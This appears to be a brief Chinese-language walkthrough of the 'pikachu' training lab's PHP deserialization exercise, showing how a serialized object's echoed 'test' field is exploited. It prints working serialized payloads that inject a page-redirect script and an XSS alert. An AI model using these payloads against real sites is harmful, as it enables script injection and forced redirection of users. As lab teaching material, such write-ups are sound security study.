pikachu之PHP反序列化
概述
输入框的name=‘o’
看一下源码,意思是把输入的内容进行反序列化生成对象实例,然后输出对象实例的test这个数据成员
构造匹配的序列化代码
访问一下 可以得到序列化的结果O:1:"S":1:{s:4:"test";s:4:"1234";}
输出了预设的1234
构造恶意代码,实现页面跳转
得到恶意对象的序列化值O:1:"S":1:{s:4:"test";s:64:"<script>window.location.replace('http://www.baidu.com')</script>";}
点击提交时,就实现了页面跳转
构造xss的恶意payload
O:1:"S":1:{s:4:"test";s:27:"<script>alert(123)</script>";}